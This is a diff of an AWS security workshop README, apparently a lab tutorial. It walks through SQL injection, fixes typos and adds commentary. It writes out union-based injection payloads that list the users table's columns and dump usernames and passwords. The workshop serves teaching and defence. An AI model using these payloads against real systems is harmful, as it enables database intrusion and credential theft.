charliejllewellyn/aws-security-workshop/prevention/README.md

 If we search down the list of tables we'll discover one called **users**

-1. We'll now see what columns are avaialble in the table
+1. We'll now see what columns are available in the table

 ```
 1' or 1 = 1 union select null, column_name from information_schema.columns where table_name = "users"#
 ```

+Here we can see a users user and password column....interesting ;-)

 </details>

-Finally we'll dump some data
+Finally, we'll dump the data

 ```
 1' or 1 = 1 union select user,password from users#